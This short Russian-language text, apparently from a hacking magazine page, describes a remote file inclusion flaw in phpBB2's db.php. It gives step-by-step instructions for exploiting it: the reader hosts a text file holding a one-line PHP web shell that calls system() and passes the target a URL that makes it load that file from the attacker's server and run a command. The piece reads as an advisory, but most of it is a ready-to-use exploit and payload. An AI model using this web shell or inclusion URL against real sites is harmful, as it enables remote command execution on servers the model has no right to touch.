Хакер #305. Многошаговые SQL-инъекции
PhpBB2 - мощный, полностью масштабируемый, пакет для создания форумов.
Переменная Phpbb_root_path принимает сценарии от внешних серверов, позволяя удаленному нападающему выполнять произвольные команды.
Уязвимость найдена в сценарии db.php:
input: '/phpBB2/includes/db.php?phpbb_root_path=full_path_to_script'
ведь full_path_to_script может быть URL c другого Web сервера. Например, создайте директорию 'db' на вашем Web сервере. Затем в этой директории создайте файл 'mysql.txt' или 'mysql4.txt' или 'postgres.txt' (другие имена почему-то не срабатывают).
Этот mysql.txt должен содержать эту строку:
<? echo "<pre>"; system($cmd); ?>
Передайте срипту следующий URL:
http://example.com/phpBB2/includes/db.php?phpbb_root_path= http://your_http_server/&dbms=mysql&phpEx=txt&cmd=uname%20-a